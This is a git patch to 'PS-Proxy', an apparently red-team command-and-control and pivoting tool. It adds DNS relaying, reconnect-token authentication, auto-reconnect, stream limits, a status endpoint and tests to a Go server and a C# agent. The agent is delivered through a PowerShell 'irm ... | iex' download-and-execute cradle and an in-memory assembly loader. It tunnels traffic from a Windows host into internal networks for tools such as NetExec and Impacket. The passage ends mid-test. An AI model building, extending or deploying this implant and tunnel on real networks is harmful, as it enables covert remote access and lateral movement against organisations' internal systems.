From 639ecef10db113b9a1f4341518ba33002365696a Mon Sep 17 00:00:00 2001 From: Harrison-Wells-Cyber Date: Wed, 22 Jul 2026 11:20:39 -0700 Subject: [PATCH 1/2] Polish tunnel reliability edge cases --- README.md | 15 +- agent/PSProxy.Agent/PSProxy.Agent.cs | 82 +++++++- agent/loader/agent.ps1.tmpl | 10 +- cmd/psproxy-server/main.go | 291 ++++++++++++++++++++++++--- cmd/psproxy-server/main_test.go | 126 ++++++++++++ internal/protocol/protocol.go | 2 + internal/staging/staging.go | 66 +++--- internal/staging/staging_test.go | 49 +++++ tools/build-agent.ps1 | 2 + 9 files changed, 575 insertions(+), 68 deletions(-) create mode 100644 cmd/psproxy-server/main_test.go create mode 100644 internal/staging/staging_test.go diff --git a/README.md b/README.md index 9fbbde0..dd98c8e 100644 --- a/README.md +++ b/README.md @@ -96,7 +96,10 @@ sudo ./psproxy-server \ --cert /etc/letsencrypt/live/c2.example.com/fullchain.pem \ --key /etc/letsencrypt/live/c2.example.com/privkey.pem \ --route 10.10.10.0/24 \ - --redirect + --redirect \ + --max-streams 256 \ + --dns-listen 127.0.0.1:5353 \ + --dns-target 10.10.10.10:53 ``` With `--redirect`, PS-Proxy creates an iptables NAT chain for each `--route` and @@ -140,7 +143,8 @@ ldapsearch -x -H ldap://127.0.0.1:1389 -D 'user@example.local' -W -b 'DC=example Transparent redirect mode is the recommended test-environment workflow right now. The fixed-target relay remains useful when you want a single local port mapped to -a single target for debugging. +a single target for debugging. Use `--max-streams` to cap concurrent proxied TCP +connections during high-concurrency tools such as NetExec; the default is 256. When `--dns-listen` and `--dns-target` are set together, the server exposes a UDP DNS listener and forwards raw DNS queries through the enrolled agent to the internal DNS server reachable from the agent host. ## Security notes @@ -163,10 +167,14 @@ Implemented now: - Go TLS listener with mixed HTTP staging and raw agent tunnel handling. - Leaf certificate pin calculation for generated agent configuration. - Short-lived one-time staging URLs. -- One-time enrollment token validation for the raw tunnel. +- One-time enrollment token validation for the raw tunnel plus reconnect-token authentication after first enrollment. +- Agent auto-reconnect with exponential backoff for transient tunnel failures. - Framed multiplexed stream protocol. - Linux transparent TCP redirect mode for direct local-tool TCP connections to routed target IPs. - Fixed-target TCP relay mode for protocol validation. +- Bounded concurrent stream handling with per-stream local write queues so one slow local TCP client cannot block the whole multiplexed agent session. +- Optional UDP DNS relay that forwards raw DNS queries through the agent to an internal DNS server. +- JSON `/status` endpoint for agent and stream visibility. - C# agent stream relay that opens normal outbound `TcpClient` connections from the Windows host. - PowerShell loader template that loads a compressed/base64 managed assembly from @@ -190,5 +198,6 @@ matrix that includes: - NetExec SMB/LDAP tests; - Impacket SMB/LDAP/RPC tests; - reconnect and stale route cleanup tests; +- DNS relay tests against an internal AD DNS server; - malformed frame and enrollment fuzz tests; - certificate pin mismatch tests. diff --git a/agent/PSProxy.Agent/PSProxy.Agent.cs b/agent/PSProxy.Agent/PSProxy.Agent.cs index 4d7c014..bc9cf3d 100644 --- a/agent/PSProxy.Agent/PSProxy.Agent.cs +++ b/agent/PSProxy.Agent/PSProxy.Agent.cs @@ -14,38 +14,63 @@ namespace PSProxy.Agent { public sealed class Tunnel { - private const byte FrameOpen = 1, FrameOpenOK = 2, FrameOpenFail = 3, FrameData = 4, FrameClose = 5, FramePing = 6, FramePong = 7; + private const byte FrameOpen = 1, FrameOpenOK = 2, FrameOpenFail = 3, FrameData = 4, FrameClose = 5, FramePing = 6, FramePong = 7, FrameDNSQuery = 8, FrameDNSReply = 9; private const int MaxPayload = 1 << 20; private readonly string server; private readonly int port; private readonly string certPin; private readonly string enrollToken; + private readonly string reconnectToken; + private readonly string dnsTarget; private readonly ConcurrentDictionary streams = new ConcurrentDictionary(); private readonly object sendLock = new object(); private SslStream tls; private volatile bool stopping; - public Tunnel(string server, int port, string certPin, string enrollToken) + public Tunnel(string server, int port, string certPin, string enrollToken, string reconnectToken, string dnsTarget) { this.server = server; this.port = port; this.certPin = NormalizeHex(certPin); this.enrollToken = enrollToken; + this.reconnectToken = reconnectToken ?? ""; + this.dnsTarget = dnsTarget ?? ""; if (this.certPin.Length != 64) throw new ArgumentException("CertPin must be a SHA-256 hex string"); if (String.IsNullOrWhiteSpace(enrollToken)) throw new ArgumentException("EnrollToken is required"); } public void Run() + { + int delayMs = 1000; + while (!stopping) + { + try + { + RunOnce(); + delayMs = 1000; + } + catch (Exception ex) + { + Console.Error.WriteLine("[ps-proxy] tunnel error: {0}", ex.Message); + CloseAllStreams(); + if (stopping) break; + Thread.Sleep(delayMs); + delayMs = Math.Min(delayMs * 2, 30000); + } + } + } + + private void RunOnce() { Console.Error.WriteLine("[ps-proxy] connecting to {0}:{1}", server, port); using (var tcp = new TcpClient()) { tcp.NoDelay = true; - tcp.Connect(server, port); + ConnectWithTimeout(tcp, server, port, 15000); using (tls = new SslStream(tcp.GetStream(), false, ValidateServerCertificate)) { tls.AuthenticateAsClient(server, null, SslProtocols.Tls12, false); - WriteAscii("PSP1\nENROLL " + enrollToken + "\n"); + WriteAscii("PSP1\nENROLL " + enrollToken + " " + reconnectToken + "\n"); Frame hello = ReadFrame(); if (hello.Type != FramePong || Encoding.ASCII.GetString(hello.Payload) != "OK") throw new Exception("server did not accept enrollment"); Console.Error.WriteLine("[ps-proxy] enrolled and ready"); @@ -65,6 +90,7 @@ namespace PSProxy.Agent case FrameData: HandleData(f.StreamID, f.Payload); break; case FrameClose: CloseStream(f.StreamID, false); break; case FramePing: SendFrame(new Frame(f.StreamID, FramePong, new byte[0])); break; + case FrameDNSQuery: StartDnsQuery(f.StreamID, f.Payload); break; } } } @@ -76,7 +102,7 @@ namespace PSProxy.Agent string host; int dstPort; SplitTarget(target, out host, out dstPort); var client = new TcpClient(); client.NoDelay = true; - client.Connect(host, dstPort); + ConnectWithTimeout(client, host, dstPort, 15000); var ctx = new StreamCtx(sid, client); if (!streams.TryAdd(sid, ctx)) { client.Close(); throw new Exception("duplicate stream"); } SendFrame(new Frame(sid, FrameOpenOK, new byte[0])); @@ -98,6 +124,36 @@ namespace PSProxy.Agent catch { CloseStream(sid, true); } } + private void StartDnsQuery(ulong sid, byte[] payload) + { + var t = new Thread(delegate() { HandleDnsQuery(sid, payload); }); + t.IsBackground = true; + t.Start(); + } + + private void HandleDnsQuery(ulong sid, byte[] payload) + { + try + { + if (String.IsNullOrWhiteSpace(dnsTarget)) throw new Exception("DNS target is not configured"); + string host; int dstPort; SplitTarget(dnsTarget, out host, out dstPort); + using (var udp = new UdpClient()) + { + udp.Client.ReceiveTimeout = 5000; + udp.Connect(host, dstPort); + udp.Send(payload, payload.Length); + IPEndPoint ep = null; + byte[] resp = udp.Receive(ref ep); + SendFrame(new Frame(sid, FrameDNSReply, resp)); + } + } + catch (Exception ex) + { + Console.Error.WriteLine("[ps-proxy] DNS query failed: " + ex.Message); + SendFrame(new Frame(sid, FrameDNSReply, new byte[0])); + } + } + private void PumpTargetToServer(StreamCtx ctx) { byte[] buf = new byte[32768]; @@ -126,6 +182,11 @@ namespace PSProxy.Agent } } + private void CloseAllStreams() + { + foreach (ulong sid in streams.Keys) CloseStream(sid, false); + } + private void SendFrame(Frame f) { if (f.Payload == null) f.Payload = new byte[0]; @@ -192,6 +253,17 @@ namespace PSProxy.Agent if (dstPort < 1 || dstPort > 65535) throw new ArgumentException("invalid port"); } + private static void ConnectWithTimeout(TcpClient client, string host, int dstPort, int timeoutMs) + { + IAsyncResult ar = client.BeginConnect(host, dstPort, null, null); + if (!ar.AsyncWaitHandle.WaitOne(timeoutMs)) + { + try { client.Close(); } catch { } + throw new TimeoutException("connect timed out: " + host + ":" + dstPort); + } + client.EndConnect(ar); + } + private static string NormalizeHex(string s) { return (s ?? "").Trim().ToLowerInvariant().Replace(":", "").Replace(" ", ""); } private static void WriteI32BE(byte[] b, int o, int v) { b[o] = (byte)(v >> 24); b[o + 1] = (byte)(v >> 16); b[o + 2] = (byte)(v >> 8); b[o + 3] = (byte)v; } private static int ReadI32BE(byte[] b, int o) { return ((int)b[o] << 24) | ((int)b[o + 1] << 16) | ((int)b[o + 2] << 8) | (int)b[o + 3]; } diff --git a/agent/loader/agent.ps1.tmpl b/agent/loader/agent.ps1.tmpl index 4bf9f05..4b6349a 100644 --- a/agent/loader/agent.ps1.tmpl +++ b/agent/loader/agent.ps1.tmpl @@ -4,6 +4,8 @@ param( [int]$Port = {{.Port}}, [string]$CertPin = "{{.CertPin}}", [string]$EnrollToken = "{{.EnrollToken}}", + [string]$ReconnectToken = "{{.ReconnectToken}}", + [string]$DNSTarget = "{{.DNSTarget}}", [switch]$NoAutoStart ) $ErrorActionPreference = "Stop" @@ -29,10 +31,12 @@ function Start-PSTunnel { [Parameter(Mandatory=$true)][string]$Server, [int]$Port = 443, [Parameter(Mandatory=$true)][string]$CertPin, - [Parameter(Mandatory=$true)][string]$EnrollToken + [Parameter(Mandatory=$true)][string]$EnrollToken, + [string]$ReconnectToken = "", + [string]$DNSTarget = "" ) if (-not ("PSProxy.Agent.Tunnel" -as [type])) { Import-PSProxyAgentAssembly } - $t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $CertPin, $EnrollToken) + $t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $CertPin, $EnrollToken, $ReconnectToken, $DNSTarget) $t.Run() } -if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -CertPin $CertPin -EnrollToken $EnrollToken } +if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -CertPin $CertPin -EnrollToken $EnrollToken -ReconnectToken $ReconnectToken -DNSTarget $DNSTarget } diff --git a/cmd/psproxy-server/main.go b/cmd/psproxy-server/main.go index 52cfe52..342d822 100644 --- a/cmd/psproxy-server/main.go +++ b/cmd/psproxy-server/main.go @@ -5,6 +5,7 @@ import ( "crypto/sha256" "crypto/tls" "encoding/hex" + "encoding/json" "encoding/pem" "errors" "flag" @@ -38,6 +39,9 @@ func main() { agentAssemblyFile := flag.String("agent-assembly-b64-file", "", "file containing compressed/base64 PSProxy.Agent.dll; defaults to release/agent_assembly.b64 when present") redirect := flag.Bool("redirect", false, "install Linux iptables REDIRECT rules for --route CIDRs and relay original destinations through the agent") redirectPort := flag.Int("redirect-port", 15080, "local transparent redirect listener port") + maxStreams := flag.Int("max-streams", 256, "maximum concurrent proxied TCP streams") + dnsListen := flag.String("dns-listen", "", "optional UDP DNS listener that forwards queries through the agent, e.g. 127.0.0.1:5353") + dnsTarget := flag.String("dns-target", "", "DNS server reachable by the agent for --dns-listen queries, e.g. 10.10.10.10:53") tcpListen := flag.String("tcp-listen", "", "developer TCP relay listener, e.g. 127.0.0.1:1389") tcpTarget := flag.String("tcp-target", "", "developer TCP relay target opened by the agent, e.g. 10.10.10.219:389") routes := multiFlag{} @@ -57,9 +61,15 @@ func main() { if (*tcpListen == "") != (*tcpTarget == "") { log.Fatal("--tcp-listen and --tcp-target must be supplied together") } + if (*dnsListen == "") != (*dnsTarget == "") { + log.Fatal("--dns-listen and --dns-target must be supplied together") + } if *redirect && len(routes) == 0 { log.Fatal("--redirect requires at least one --route CIDR") } + if err := validateRoutes(routes); err != nil { + log.Fatal(err) + } pin, err := certPin(*cert) if err != nil { log.Fatalf("certificate pin failed: %v", err) @@ -73,14 +83,15 @@ func main() { } tmpl := template.Must(template.ParseFiles(*agentTemplate)) store := staging.NewStore(*ttl) - sess, err := store.Create(*domain, *port, pin) + sess, err := store.Create(*domain, *port, pin, *dnsTarget) if err != nil { log.Fatal(err) } - server := NewTunnelServer(store) + server := NewTunnelServer(store, *maxStreams) mux := http.NewServeMux() mux.HandleFunc("GET /a/{id}", staging.AgentHandler(store, tmpl, assembly)) mux.HandleFunc("GET /healthz", func(w http.ResponseWriter, r *http.Request) { _, _ = w.Write([]byte("ok\n")) }) + mux.HandleFunc("GET /status", statusHandler(server)) var redirectCleanup func() if *redirect { redirectCleanup = setupRedirectOrFatal(routes, *redirectPort) @@ -90,6 +101,9 @@ func main() { if *tcpListen != "" { go serveTCPRelay(*tcpListen, *tcpTarget, server) } + if *dnsListen != "" { + go serveDNSRelay(*dnsListen, server) + } installSignalCleanup(redirectCleanup) addr := fmt.Sprintf("%s:%d", *listen, *port) log.Printf("PS-Proxy Go server starting on https://%s", addr) @@ -102,18 +116,28 @@ func main() { if *tcpListen != "" { log.Printf("Developer TCP relay: %s -> agent -> %s", *tcpListen, *tcpTarget) } + if *dnsListen != "" { + log.Printf("DNS relay: %s -> agent -> %s", *dnsListen, *dnsTarget) + } log.Printf("Run this on the Windows host: irm %s/a/%s | iex", publicURL(*domain, *port), sess.ID) log.Fatal(serveMixedTLS(addr, *cert, *key, mux, server)) } type TunnelServer struct { - store *staging.Store - mu sync.Mutex - session *AgentSession - nextID atomic.Uint64 + store *staging.Store + mu sync.Mutex + session *AgentSession + nextID atomic.Uint64 + dnsID atomic.Uint64 + maxStreams int } -func NewTunnelServer(store *staging.Store) *TunnelServer { return &TunnelServer{store: store} } +func NewTunnelServer(store *staging.Store, maxStreams int) *TunnelServer { + if maxStreams < 1 { + maxStreams = 1 + } + return &TunnelServer{store: store, maxStreams: maxStreams} +} func (s *TunnelServer) SetSession(a *AgentSession) { s.mu.Lock() @@ -127,13 +151,23 @@ func (s *TunnelServer) SetSession(a *AgentSession) { func (s *TunnelServer) Current() *AgentSession { s.mu.Lock(); defer s.mu.Unlock(); return s.session } +func (s *TunnelServer) ClearSession(a *AgentSession) { + s.mu.Lock() + if s.session == a { + s.session = nil + } + s.mu.Unlock() +} + func (s *TunnelServer) OpenAttached(target string, local net.Conn) (*AgentSession, uint64, error) { a := s.Current() if a == nil { return nil, 0, errors.New("no enrolled agent connected") } id := s.nextID.Add(1) - a.AttachLocal(id, local) + if err := a.AttachLocal(id, local); err != nil { + return nil, 0, err + } if err := a.Open(id, target); err != nil { a.RemoveLocal(id) return nil, 0, err @@ -142,21 +176,45 @@ func (s *TunnelServer) OpenAttached(target string, local net.Conn) (*AgentSessio } type AgentSession struct { - conn net.Conn - br *bufio.Reader - sendMu sync.Mutex - closeOnce sync.Once - closed chan struct{} - mu sync.Mutex - pending map[uint64]chan error - locals map[uint64]net.Conn + conn net.Conn + br *bufio.Reader + sendMu sync.Mutex + closeOnce sync.Once + closed chan struct{} + mu sync.Mutex + pending map[uint64]chan error + dnsPending map[uint64]chan []byte + locals map[uint64]*localStream + maxStreams int } -func NewAgentSession(c net.Conn, br *bufio.Reader) *AgentSession { - return &AgentSession{conn: c, br: br, closed: make(chan struct{}), pending: map[uint64]chan error{}, locals: map[uint64]net.Conn{}} +func NewAgentSession(c net.Conn, br *bufio.Reader, maxStreams int) *AgentSession { + if maxStreams < 1 { + maxStreams = 1 + } + return &AgentSession{conn: c, br: br, closed: make(chan struct{}), pending: map[uint64]chan error{}, dnsPending: map[uint64]chan []byte{}, locals: map[uint64]*localStream{}, maxStreams: maxStreams} } -func (a *AgentSession) Close() { a.closeOnce.Do(func() { close(a.closed); _ = a.conn.Close() }) } +func (a *AgentSession) Close() { + a.closeOnce.Do(func() { + close(a.closed) + _ = a.conn.Close() + a.mu.Lock() + for id, ch := range a.pending { + delete(a.pending, id) + ch <- errors.New("agent session closed") + } + for id, ch := range a.dnsPending { + delete(a.dnsPending, id) + close(ch) + } + for id, ls := range a.locals { + delete(a.locals, id) + ls.close() + } + a.mu.Unlock() + }) +} func (a *AgentSession) send(f protocol.Frame) error { a.sendMu.Lock() @@ -186,16 +244,29 @@ func (a *AgentSession) Open(id uint64, target string) error { } } -func (a *AgentSession) AttachLocal(id uint64, c net.Conn) { +func (a *AgentSession) AttachLocal(id uint64, c net.Conn) error { a.mu.Lock() - a.locals[id] = c - a.mu.Unlock() + defer a.mu.Unlock() + select { + case <-a.closed: + return errors.New("agent session closed") + default: + } + if len(a.locals) >= a.maxStreams { + return fmt.Errorf("maximum concurrent streams reached: %d", a.maxStreams) + } + a.locals[id] = newLocalStream(c) + return nil } func (a *AgentSession) RemoveLocal(id uint64) { a.mu.Lock() + ls := a.locals[id] delete(a.locals, id) a.mu.Unlock() + if ls != nil { + ls.close() + } } func (a *AgentSession) Run() { @@ -225,18 +296,21 @@ func (a *AgentSession) Run() { } case protocol.FrameData: a.mu.Lock() - c := a.locals[f.StreamID] + ls := a.locals[f.StreamID] a.mu.Unlock() - if c != nil { - _, _ = c.Write(f.Payload) + if ls != nil && !ls.enqueue(f.Payload) { + a.RemoveLocal(f.StreamID) + _ = a.send(protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameClose}) } case protocol.FrameClose: + a.RemoveLocal(f.StreamID) + case protocol.FrameDNSReply: a.mu.Lock() - c := a.locals[f.StreamID] - delete(a.locals, f.StreamID) + ch := a.dnsPending[f.StreamID] + delete(a.dnsPending, f.StreamID) a.mu.Unlock() - if c != nil { - _ = c.Close() + if ch != nil { + ch <- f.Payload } case protocol.FramePing: _ = a.send(protocol.Frame{StreamID: f.StreamID, Type: protocol.FramePong}) @@ -244,6 +318,140 @@ func (a *AgentSession) Run() { } } +type localStream struct { + conn net.Conn + ch chan []byte + done chan struct{} + once sync.Once +} + +func newLocalStream(c net.Conn) *localStream { + ls := &localStream{conn: c, ch: make(chan []byte, 32), done: make(chan struct{})} + go ls.writeLoop() + return ls +} + +func (l *localStream) enqueue(payload []byte) bool { + buf := append([]byte(nil), payload...) + select { + case l.ch <- buf: + return true + case <-l.done: + return false + default: + return false + } +} + +func (l *localStream) writeLoop() { + defer l.close() + for { + select { + case payload := <-l.ch: + if _, err := l.conn.Write(payload); err != nil { + return + } + case <-l.done: + return + } + } +} + +func (l *localStream) close() { + l.once.Do(func() { + close(l.done) + _ = l.conn.Close() + }) +} + +func (s *TunnelServer) Status() map[string]any { + a := s.Current() + status := map[string]any{"agent_connected": a != nil, "max_streams": s.maxStreams} + if a != nil { + a.mu.Lock() + status["active_streams"] = len(a.locals) + status["pending_opens"] = len(a.pending) + status["pending_dns"] = len(a.dnsPending) + a.mu.Unlock() + } + return status +} + +func (s *TunnelServer) QueryDNS(query []byte) ([]byte, error) { + a := s.Current() + if a == nil { + return nil, errors.New("no enrolled agent connected") + } + id := s.dnsID.Add(1) + ch := make(chan []byte, 1) + a.mu.Lock() + select { + case <-a.closed: + a.mu.Unlock() + return nil, errors.New("agent session closed") + default: + } + a.dnsPending[id] = ch + a.mu.Unlock() + if err := a.send(protocol.Frame{StreamID: id, Type: protocol.FrameDNSQuery, Payload: query}); err != nil { + a.mu.Lock() + delete(a.dnsPending, id) + a.mu.Unlock() + return nil, err + } + select { + case resp, ok := <-ch: + if !ok { + return nil, errors.New("agent session closed") + } + if len(resp) == 0 { + return nil, errors.New("empty DNS response from agent") + } + return resp, nil + case <-time.After(5 * time.Second): + a.mu.Lock() + delete(a.dnsPending, id) + a.mu.Unlock() + return nil, errors.New("timeout waiting for DNS response") + } +} + +func statusHandler(server *TunnelServer) http.HandlerFunc { + return func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/json") + _ = json.NewEncoder(w).Encode(server.Status()) + } +} + +func serveDNSRelay(listenAddr string, server *TunnelServer) { + addr, err := net.ResolveUDPAddr("udp", listenAddr) + if err != nil { + log.Fatalf("dns relay resolve failed: %v", err) + } + conn, err := net.ListenUDP("udp", addr) + if err != nil { + log.Fatalf("dns relay listen failed: %v", err) + } + log.Printf("dns relay listening on udp://%s", listenAddr) + buf := make([]byte, 4096) + for { + n, client, err := conn.ReadFromUDP(buf) + if err != nil { + log.Printf("dns relay read failed: %v", err) + continue + } + query := append([]byte(nil), buf[:n]...) + go func() { + resp, err := server.QueryDNS(query) + if err != nil { + log.Printf("dns relay query failed: %v", err) + return + } + _, _ = conn.WriteToUDP(resp, client) + }() + } +} + func serveTransparentRelay(listenAddr string, server *TunnelServer) { ln, err := net.Listen("tcp4", listenAddr) if err != nil { @@ -299,6 +507,15 @@ func originalDst(c net.Conn) (string, error) { return target, nil } +func validateRoutes(routes []string) error { + for _, route := range routes { + if _, _, err := net.ParseCIDR(route); err != nil { + return fmt.Errorf("invalid --route CIDR %q: %w", route, err) + } + } + return nil +} + func setupRedirectOrFatal(routes []string, port int) func() { if os.Geteuid() != 0 { log.Fatal("--redirect requires root so iptables NAT rules can be installed") @@ -434,16 +651,27 @@ func handleAgent(conn net.Conn, br *bufio.Reader, server *TunnelServer) { _ = conn.Close() return } - if err := server.store.Enroll(strings.TrimSpace(strings.TrimPrefix(line, prefix))); err != nil { + fields := strings.Fields(strings.TrimPrefix(line, prefix)) + if len(fields) == 0 { + _ = conn.Close() + return + } + enrollToken := fields[0] + reconnectToken := "" + if len(fields) > 1 { + reconnectToken = fields[1] + } + if err := server.store.Authenticate(enrollToken, reconnectToken); err != nil { log.Printf("agent enrollment failed: %v", err) _ = conn.Close() return } - a := NewAgentSession(conn, br) + a := NewAgentSession(conn, br, server.maxStreams) server.SetSession(a) log.Printf("agent enrolled and connected from %s", conn.RemoteAddr()) _ = a.send(protocol.Frame{Type: protocol.FramePong, Payload: []byte("OK")}) a.Run() + server.ClearSession(a) } type singleListener struct { @@ -454,7 +682,6 @@ type singleListener struct { func (s *singleListener) Accept() (net.Conn, error) { if s.conn == nil { - <-s.done return nil, io.EOF } c := s.conn diff --git a/cmd/psproxy-server/main_test.go b/cmd/psproxy-server/main_test.go new file mode 100644 index 0000000..ad26c14 --- /dev/null +++ b/cmd/psproxy-server/main_test.go @@ -0,0 +1,126 @@ +package main + +import ( + "bufio" + "net" + "testing" + "time" + + "github.com/psproxy/psproxy/internal/protocol" + "github.com/psproxy/psproxy/internal/staging" +) + +func TestTunnelServerMaxStreams(t *testing.T) { + server := NewTunnelServer(staging.NewStore(time.Minute), 1) + agent, peer := net.Pipe() + defer peer.Close() + sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams) + defer sess.Close() + server.SetSession(sess) + + local1, remote1 := net.Pipe() + defer remote1.Close() + defer local1.Close() + if err := sess.AttachLocal(1, local1); err != nil { + t.Fatalf("first stream should attach: %v", err) + } + + local2, remote2 := net.Pipe() + defer remote2.Close() + defer local2.Close() + if err := sess.AttachLocal(2, local2); err == nil { + t.Fatal("second stream should be rejected at max stream limit") + } +} + +func TestLocalStreamBackpressureClosesConnection(t *testing.T) { + local, remote := net.Pipe() + defer remote.Close() + ls := newLocalStream(local) + defer ls.close() + + failed := false + for i := 0; i < cap(ls.ch)+10; i++ { + if !ls.enqueue([]byte("x")) { + failed = true + break + } + } + if !failed { + t.Fatal("enqueue should eventually fail when the local write queue is full") + } +} + +func TestTunnelServerQueryDNS(t *testing.T) { + server := NewTunnelServer(staging.NewStore(time.Minute), 2) + agent, peer := net.Pipe() + defer peer.Close() + sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams) + defer sess.Close() + server.SetSession(sess) + go sess.Run() + + go func() { + f, err := protocol.ReadFrame(peer) + if err != nil { + return + } + _ = protocol.WriteFrame(peer, protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameDNSReply, Payload: []byte("dns-response")}) + }() + + resp, err := server.QueryDNS([]byte("dns-query")) + if err != nil { + t.Fatalf("dns query failed: %v", err) + } + if string(resp) != "dns-response" { + t.Fatalf("unexpected dns response: %q", resp) + } +} + +func TestValidateRoutes(t *testing.T) { + if err := validateRoutes([]string{"10.0.0.0/24", "192.168.1.10/32"}); err != nil { + t.Fatalf("valid routes rejected: %v", err) + } + if err := validateRoutes([]string{"not-a-cidr"}); err == nil { + t.Fatal("invalid CIDR should be rejected") + } +} + +func TestTunnelServerQueryDNSEmptyResponseFails(t *testing.T) { + server := NewTunnelServer(staging.NewStore(time.Minute), 2) + agent, peer := net.Pipe() + defer peer.Close() + sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams) + defer sess.Close() + server.SetSession(sess) + go sess.Run() + + go func() { + f, err := protocol.ReadFrame(peer) + if err != nil { + return + } + _ = protocol.WriteFrame(peer, protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameDNSReply}) + }() + + if _, err := server.QueryDNS([]byte("dns-query")); err == nil { + t.Fatal("empty DNS replies should fail") + } +} + +func TestSingleListenerAcceptReturnsEOFAfterFirstConn(t *testing.T) { + c1, c2 := net.Pipe() + defer c1.Close() + defer c2.Close() + ln := &singleListener{conn: c1, done: make(chan struct{})} + got, err := ln.Accept() + if err != nil { + t.Fatalf("first accept failed: %v", err) + } + if got != c1 { + t.Fatal("first accept returned unexpected connection") + } + if _, err := ln.Accept(); err == nil { + t.Fatal("second accept should return EOF") + } +} diff --git a/internal/protocol/protocol.go b/internal/protocol/protocol.go index 08787ca..1eaf091 100644 --- a/internal/protocol/protocol.go +++ b/internal/protocol/protocol.go @@ -16,6 +16,8 @@ const ( FrameClose byte = 5 FramePing byte = 6 FramePong byte = 7 + FrameDNSQuery byte = 8 + FrameDNSReply byte = 9 MaxPayload = 1 << 20 ) diff --git a/internal/staging/staging.go b/internal/staging/staging.go index 72a6d83..502e7ea 100644 --- a/internal/staging/staging.go +++ b/internal/staging/staging.go @@ -11,25 +11,28 @@ import ( ) type Session struct { - ID string - Server string - Port int - CertPin string - EnrollToken string - ExpiresAt time.Time - Delivered bool - Enrolled bool + ID string + Server string + Port int + CertPin string + EnrollToken string + ReconnectToken string + DNSTarget string + ExpiresAt time.Time + Delivered bool + Enrolled bool } type Store struct { - mu sync.Mutex - sessions map[string]*Session - tokens map[string]*Session - ttl time.Duration + mu sync.Mutex + sessions map[string]*Session + tokens map[string]*Session + reconnects map[string]*Session + ttl time.Duration } func NewStore(ttl time.Duration) *Store { - return &Store{sessions: map[string]*Session{}, tokens: map[string]*Session{}, ttl: ttl} + return &Store{sessions: map[string]*Session{}, tokens: map[string]*Session{}, reconnects: map[string]*Session{}, ttl: ttl} } func NewSecret(n int) (string, error) { @@ -40,7 +43,7 @@ func NewSecret(n int) (string, error) { return base64.RawURLEncoding.EncodeToString(b), nil } -func (s *Store) Create(server string, port int, certPin string) (*Session, error) { +func (s *Store) Create(server string, port int, certPin, dnsTarget string) (*Session, error) { id, err := NewSecret(18) if err != nil { return nil, err @@ -49,11 +52,16 @@ func (s *Store) Create(server string, port int, certPin string) (*Session, error if err != nil { return nil, err } - sess := &Session{ID: id, Server: server, Port: port, CertPin: certPin, EnrollToken: tok, ExpiresAt: time.Now().Add(s.ttl)} + reconnect, err := NewSecret(32) + if err != nil { + return nil, err + } + sess := &Session{ID: id, Server: server, Port: port, CertPin: certPin, EnrollToken: tok, ReconnectToken: reconnect, DNSTarget: dnsTarget, ExpiresAt: time.Now().Add(s.ttl)} s.mu.Lock() defer s.mu.Unlock() s.sessions[id] = sess s.tokens[tok] = sess + s.reconnects[reconnect] = sess return sess, nil } @@ -67,6 +75,7 @@ func (s *Store) RedeemScript(id string) (*Session, error) { if time.Now().After(sess.ExpiresAt) { delete(s.sessions, id) delete(s.tokens, sess.EnrollToken) + delete(s.reconnects, sess.ReconnectToken) return nil, errors.New("enrollment expired") } if sess.Delivered { @@ -76,19 +85,24 @@ func (s *Store) RedeemScript(id string) (*Session, error) { return sess, nil } -func (s *Store) Enroll(token string) error { +func (s *Store) Authenticate(enrollToken, reconnectToken string) error { s.mu.Lock() defer s.mu.Unlock() - sess := s.tokens[token] + sess := s.reconnects[reconnectToken] + if sess != nil && sess.Enrolled { + return nil + } + sess = s.tokens[enrollToken] if sess == nil { return errors.New("invalid enrollment token") } if time.Now().After(sess.ExpiresAt) { delete(s.sessions, sess.ID) - delete(s.tokens, token) + delete(s.tokens, enrollToken) + delete(s.reconnects, sess.ReconnectToken) return errors.New("enrollment expired") } - if sess.Enrolled { + if sess.Enrolled && sess.ReconnectToken != reconnectToken { return errors.New("enrollment token already used") } sess.Enrolled = true @@ -96,11 +110,13 @@ func (s *Store) Enroll(token string) error { } type AgentTemplateData struct { - AssemblyB64 string - Server string - Port int - CertPin string - EnrollToken string + AssemblyB64 string + Server string + Port int + CertPin string + EnrollToken string + ReconnectToken string + DNSTarget string } func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) http.HandlerFunc { @@ -113,6 +129,6 @@ func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) htt } w.Header().Set("Content-Type", "text/plain; charset=utf-8") w.Header().Set("Cache-Control", "no-store") - _ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, CertPin: sess.CertPin, EnrollToken: sess.EnrollToken}) + _ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, CertPin: sess.CertPin, EnrollToken: sess.EnrollToken, ReconnectToken: sess.ReconnectToken, DNSTarget: sess.DNSTarget}) } } diff --git a/internal/staging/staging_test.go b/internal/staging/staging_test.go new file mode 100644 index 0000000..d246eb2 --- /dev/null +++ b/internal/staging/staging_test.go @@ -0,0 +1,49 @@ +package staging + +import ( + "testing" + "time" +) + +func TestAuthenticateAllowsReconnectTokenAfterEnrollment(t *testing.T) { + store := NewStore(time.Minute) + sess, err := store.Create("c2.example.com", 443, "pin", "10.0.0.10:53") + if err != nil { + t.Fatalf("create session: %v", err) + } + if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil { + t.Fatalf("initial enrollment failed: %v", err) + } + if err := store.Authenticate("", sess.ReconnectToken); err != nil { + t.Fatalf("reconnect failed: %v", err) + } +} + +func TestAuthenticateRejectsReusedEnrollTokenWithoutReconnectToken(t *testing.T) { + store := NewStore(time.Minute) + sess, err := store.Create("c2.example.com", 443, "pin", "") + if err != nil { + t.Fatalf("create session: %v", err) + } + if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil { + t.Fatalf("initial enrollment failed: %v", err) + } + if err := store.Authenticate(sess.EnrollToken, "wrong"); err == nil { + 